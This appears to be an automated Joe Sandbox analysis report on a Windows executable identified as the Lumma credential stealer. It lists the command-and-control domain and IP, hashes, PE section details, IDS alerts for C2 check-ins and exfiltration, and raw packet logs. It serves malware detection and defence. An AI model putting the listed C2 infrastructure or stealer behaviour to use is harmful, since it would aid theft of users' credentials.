https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2135079342.0000000006173000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/8/	file.exe, 00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2133528567.000000000607A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api5	file.exe, 00000000.00000002.2237279551.00000000018EE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz/apiye;	file.exe, 00000000.00000003.2159875964.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159575392.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156812212.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2132681260.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159595354.00000000019C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz:443/api	file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000003.2135403681.0000000006068000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	file.exe, 00000000.00000003.2132681260.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237383660.0000000001941000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081424148.0000000001960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.000000000195F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2080931138.000000000195D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api.	file.exe, 00000000.00000003.2132681260.000000000195D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2081545065.0000000006086000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081356190.0000000006089000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoftyo;	file.exe, 00000000.00000003.2080931138.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2058959258.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237778517.00000000019AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196862230.0000000001961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081779151.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156812212.000000000195D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236118925.00000000019A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2081424148.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106519599.0000000001999000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2132681260.0000000001999000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://atten-supporse.biz/X/	file.exe, 00000000.00000002.2237700583.0000000001961000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.80.1	atten-supporse.biz	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572006
Start date and time:	2024-12-10 00:41:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:42:01	API Interceptor	8x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.80.1	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
atten-supporse.biz	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://www.google.com.hk/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fjvsimmigration.com/c/efcfa9e5f8b2f41713ea899643a31954/YnJ1Y2VwQGxlc21hbi5jb20=	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	https://bcnys.us11.list-manage.com/track/click?u=b3ce03a042f3f32fe41fe1faf&id=8c15544f56&e=24911589a5	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.139.78
	GLAMPITECT++LTD+(PROPOSAL).eml	Get hash	malicious	unknown	Browse	104.16.144.15
	https://xxx.cloudlawservices.com/fROBJ/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.80.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949064758284723
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'858'048 bytes
MD5:	52868af74ee73e05662d437482d99489
SHA1:	ee9cf98060ceebf880c722a87745601ca856fd30
SHA256:	fd853a7428efb478e0fed242b3a4dc8fbb704e52a91dfabb4297bb2c4cc19d22
SHA512:	80bde64516f6307288a6109e31e0ad499cfb6fa331b6e9f7a0f59e390ab4867497bcbd425d113c341ed6c16b687f38f68214590d516cf1984381e1a2d0670a29
SSDEEP:	49152:OYuhgLpL1zsZuPR2Pwm15kRS96y+czXpOW9:OYwgVLxsZuPRxmTkRSH+cz5n9
TLSH:	B9853389DC8B1EA8C796DF3F5DB3C45C77468AB629A6DCB62AE718B304CB0174384075
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ug..............................I...........@...........................J.....90....@.................................\@..p..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x89e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6755B9EA [Sun Dec 8 15:23:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FD714BD12FAh
pabsb mm0, qword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FD714BD32F5h
add byte ptr [ecx], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [0200000Ah], al
or al, byte ptr [eax]
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5405c	0x70	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x24200	ab9812f81504a4952c0528fefe96a929	False	0.9975940743944637	data	7.978482515372212	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x2b0	0x400	fe67bb2a9df3150b9c94de8bd81ed8a0	False	0.3603515625	data	5.186832724894366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	f89f2f28be6f3fc6a464feb82ace12f3	False	0.15625	data	1.1194718105633323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x55000	0x2aa000	0x200	dbae581fc7edff38b531639eb9463e32	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
beewzkou	0x2ff000	0x19e000	0x19da00	3c5207dbb92720a967877b87d7ce8a4d	False	0.994259854752191	data	7.9535775684603935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
avotpigk	0x49d000	0x1000	0x400	95b7e13609e3b0758b2a5e58cec472d7	False	0.7958984375	data	6.235960107084416	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x49e000	0x3000	0x2200	c003cabefc6ccec967a3950ebb356be9	False	0.06376378676470588	DOS executable (COM)	0.8132956630554528	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x53058	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T00:42:00.288781+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.5	60747	1.1.1.1	53	UDP
2024-12-10T00:42:01.840562+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49704	104.21.80.1	443	TCP
2024-12-10T00:42:01.840562+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	104.21.80.1	443	TCP
2024-12-10T00:42:02.583861+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	104.21.80.1	443	TCP
2024-12-10T00:42:02.583861+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	104.21.80.1	443	TCP
2024-12-10T00:42:03.859465+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49705	104.21.80.1	443	TCP
2024-12-10T00:42:03.859465+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	104.21.80.1	443	TCP
2024-12-10T00:42:04.586817+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49705	104.21.80.1	443	TCP
2024-12-10T00:42:04.586817+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	104.21.80.1	443	TCP
2024-12-10T00:42:06.151959+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49706	104.21.80.1	443	TCP
2024-12-10T00:42:06.151959+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.21.80.1	443	TCP
2024-12-10T00:42:08.639831+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49707	104.21.80.1	443	TCP
2024-12-10T00:42:08.639831+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	104.21.80.1	443	TCP
2024-12-10T00:42:09.915625+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49707	104.21.80.1	443	TCP
2024-12-10T00:42:11.472061+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49708	104.21.80.1	443	TCP
2024-12-10T00:42:11.472061+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.80.1	443	TCP
2024-12-10T00:42:13.925966+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49709	104.21.80.1	443	TCP
2024-12-10T00:42:13.925966+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	104.21.80.1	443	TCP
2024-12-10T00:42:16.366705+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49710	104.21.80.1	443	TCP
2024-12-10T00:42:16.366705+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	104.21.80.1	443	TCP
2024-12-10T00:42:16.370667+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49710	104.21.80.1	443	TCP
2024-12-10T00:42:20.281960+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49716	104.21.80.1	443	TCP
2024-12-10T00:42:20.281960+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49716	104.21.80.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 00:42:00.621484995 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:00.621517897 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:00.621634960 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:00.622772932 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:00.622785091 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:01.840492964 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:01.840562105 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:01.844633102 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:01.844643116 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:01.844866991 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:01.891179085 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:01.902168989 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:01.902192116 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:01.902236938 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:02.583878994 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:02.583955050 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:02.584016085 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:02.586539984 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:02.586550951 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:02.586569071 CET	49704	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:02.586574078 CET	443	49704	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:02.640822887 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:02.640851974 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:02.640933037 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:02.641974926 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:02.641987085 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:03.859364986 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:03.859464884 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:03.861242056 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:03.861252069 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:03.861455917 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:03.862592936 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:03.862610102 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:03.862644911 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.586832047 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.586888075 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.586941004 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.586962938 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.587007046 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.587066889 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.587104082 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.587153912 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.587153912 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.587162018 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.596788883 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.596846104 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.596853018 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.612422943 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.612468004 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.612473965 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.656812906 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.706048012 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.750557899 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.778805971 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.782730103 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.782759905 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.782778978 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.782785892 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.782834053 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.782836914 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.782881975 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.783087969 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.783097982 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.783109903 CET	49705	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.783114910 CET	443	49705	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.939013004 CET	49706	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.939043045 CET	443	49706	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:04.939111948 CET	49706	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.939779997 CET	49706	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:04.939790964 CET	443	49706	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:06.151774883 CET	443	49706	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:06.151958942 CET	49706	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:06.153250933 CET	49706	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:06.153263092 CET	443	49706	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:06.153485060 CET	443	49706	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:06.154653072 CET	49706	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:06.154783010 CET	49706	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:06.154813051 CET	443	49706	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:07.068398952 CET	443	49706	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:07.068495989 CET	443	49706	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:07.068547010 CET	49706	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:07.173366070 CET	49706	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:07.173382044 CET	443	49706	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:07.426942110 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:07.426970005 CET	443	49707	104.21.80.1	192.168.2.5
Dec 10, 2024 00:42:07.427166939 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:07.427408934 CET	49707	443	192.168.2.5	104.21.80.1
Dec 10, 2024 00:42:07.427418947 CET	443	49707	104.21.80.1	192.168.2.5
